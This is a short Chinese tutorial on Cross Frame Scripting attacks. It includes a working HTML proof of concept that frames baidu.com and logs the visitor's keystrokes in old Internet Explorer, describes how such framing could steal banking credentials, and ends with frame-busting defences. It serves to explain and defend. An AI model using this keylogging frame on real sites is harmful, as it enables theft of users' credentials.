首页 > 代码库 > Cross Frame Script (跨框架脚本) 攻击
Cross Frame Script (跨框架脚本) 攻击
一、Cross Frame Script (跨框架脚本) 攻击什么是Cross Frame Script?很简单,做个实验就知道了。把下面的这段HTML代码另存为一个html文件,然后用ie浏览器打开。<html><head><title>IE Cross Frame Scripting Restriction Bypass Example</title><script>var keylog=‘‘;document.onkeypress = function () { k = window.event.keyCode; window.status = keylog += String.fromCharCode(k) + ‘[‘ + k +‘]‘;}</script></head><frameset onload="this.focus();" onblur="this.focus();" cols="100%"> <frame src="http://www.baidu.com/" scrolling="auto"></frameset></html>当你在百度的搜索框输入字符时,你会发现左下角的状态栏上出现了你输入的字符。二、Cross Frame Script 原理利用浏览器允许框架(frame)跨站包含其它页面的漏洞,在主框架的代码中加入scirpt,监视、盗取用户输入。三、Cross Frame Script 危害一个恶意的站点可以通过用框架包含真的网银或在线支付网站,获取用户账号和密码。解决方案用户:留心浏览器地址,不在带框架页面中输入用户信息网站管理员:在页面中加入以下javascirpt代码可以避免网站被XFS:if (top != self) { top.location=self.location;}
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。